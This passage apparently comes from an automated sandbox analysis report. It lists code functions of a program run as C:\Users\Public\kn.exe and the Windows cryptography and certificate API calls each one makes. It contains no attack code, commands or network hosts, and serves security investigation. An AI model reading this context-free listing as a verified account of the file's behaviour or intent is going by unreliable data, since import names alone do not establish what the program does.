Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C565D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,6_2_00007FF67C565D80
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4E5DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF67C4E5DA1
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C533D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,6_2_00007FF67C533D60
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5B5D74 CryptDecodeObjectEx,strcmp,strcmp,6_2_00007FF67C5B5D74
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C509D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C509D6C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C511D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF67C511D70
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C587D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,6_2_00007FF67C587D3C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C58BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,6_2_00007FF67C58BD3C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C541E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,6_2_00007FF67C541E2C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4E5DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,6_2_00007FF67C4E5DF7
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4C1DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,6_2_00007FF67C4C1DE8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C50DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF67C50DEA4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C53DEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,6_2_00007FF67C53DEB0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C57DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,6_2_00007FF67C57DE70
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5B5E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,6_2_00007FF67C5B5E3C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5B5F20 CryptDecodeObjectEx,6_2_00007FF67C5B5F20
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C507F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,6_2_00007FF67C507F14
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C545F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,6_2_00007FF67C545F04
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C587EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,6_2_00007FF67C587EE8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C555FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF67C555FA8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C559F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF67C559F90
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4EFF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,6_2_00007FF67C4EFF64
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C525F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,6_2_00007FF67C525F54
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5B5FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF67C5B5FF0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4E5FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF67C4E5FE8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C524070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,6_2_00007FF67C524070
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C57E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,6_2_00007FF67C57E044
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4E60DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF67C4E60DA
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4E7988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,6_2_00007FF67C4E7988
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5AB980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,6_2_00007FF67C5AB980
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C53597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF67C53597C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C579970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF67C579970
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C50F944 CryptDecodeObject,GetLastError,#357,6_2_00007FF67C50F944
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C53B950 I_CryptGetLruEntryData,#357,6_2_00007FF67C53B950
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C58BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,6_2_00007FF67C58BA14
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4DF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF67C4DF9B8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C53B9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,6_2_00007FF67C53B9CC
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5B5AA8 CryptDecodeObjectEx,6_2_00007FF67C5B5AA8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C57FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,6_2_00007FF67C57FA84
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C569A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,6_2_00007FF67C569A58
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4E3A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4E3A40
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C557A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C557A70
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C551A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,6_2_00007FF67C551A44
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C56BA50 CryptSignCertificate,SetLastError,6_2_00007FF67C56BA50
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C549AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF67C549AF8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C513B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,6_2_00007FF67C513B14
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4DBB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,6_2_00007FF67C4DBB80
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5B5B90 CryptDecodeObjectEx,memmove,6_2_00007FF67C5B5B90
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4B5BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF67C4B5BA4
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C57FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,6_2_00007FF67C57FB94
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C587B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,6_2_00007FF67C587B60
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C51BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C51BB38
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C585B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,6_2_00007FF67C585B44
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C58BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,6_2_00007FF67C58BB50
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C55FB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,6_2_00007FF67C55FB50
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C50FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C50FC34
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4EFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF67C4EFC20
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4D9BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,6_2_00007FF67C4D9BC8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C553BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C553BEB
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C55BBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF67C55BBC0
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C541C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,6_2_00007FF67C541C84
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4F1C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,6_2_00007FF67C4F1C50
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5B5C54 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF67C5B5C54
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C503C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF67C503C60
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C56DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,6_2_00007FF67C56DD1C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C57FD2C CryptDecryptMessage,GetLastError,#357,6_2_00007FF67C57FD2C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C545CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,6_2_00007FF67C545CE8
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C589580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,6_2_00007FF67C589580
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C553590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C553590
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C51B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,6_2_00007FF67C51B55C
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C57F570 CryptHashCertificate,SetLastError,6_2_00007FF67C57F570
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C5395FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,6_2_00007FF67C5395FC
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF67C4DF630 CryptAcquireContextW,GetLastError,#357,SetLastError,6_2_00007FF67C4DF630
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DD5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF67C4DD5C2
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5155F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,6_2_00007FF67C5155F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C56D6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,6_2_00007FF67C56D6A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5076B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF67C5076B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C579688 CryptFindOIDInfo,#357,#360,#360,#360,6_2_00007FF67C579688
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53B664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,6_2_00007FF67C53B664
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,6_2_00007FF67C52366C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54F644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C54F644
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C5664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,6_2_00007FF67C4C5664
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DD660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,6_2_00007FF67C4DD660
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C553654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF67C553654
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57F650 CryptHashCertificate2,SetLastError,6_2_00007FF67C57F650
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53F6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,6_2_00007FF67C53F6D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5536E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C5536E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4ED790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,6_2_00007FF67C4ED790
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5537A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF67C5537A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CB788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,6_2_00007FF67C4CB788
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52577C #360,#358,CryptDecodeObject,GetLastError,#357,6_2_00007FF67C52577C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C56B794 CryptExportPublicKeyInfoEx,SetLastError,6_2_00007FF67C56B794
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C555768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF67C555768
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,6_2_00007FF67C51F774
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,6_2_00007FF67C57D750
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EF810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,6_2_00007FF67C4EF810
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,6_2_00007FF67C57F7FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53B808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,6_2_00007FF67C53B808
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F17D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,6_2_00007FF67C4F17D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5697E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,6_2_00007FF67C5697E4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5898B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF67C5898B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E7884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,6_2_00007FF67C4E7884
